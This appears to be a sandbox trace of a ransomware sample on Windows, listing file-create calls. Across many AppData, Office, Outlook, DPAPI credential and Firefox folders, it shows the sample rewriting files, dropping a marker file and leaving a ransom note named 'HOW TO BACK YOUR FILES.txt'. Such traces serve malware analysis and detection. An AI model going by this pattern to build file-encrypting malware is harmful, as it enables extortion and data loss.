Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\hwcompat.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\hwexclude.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\nxquery.cat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\nxquery.inf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
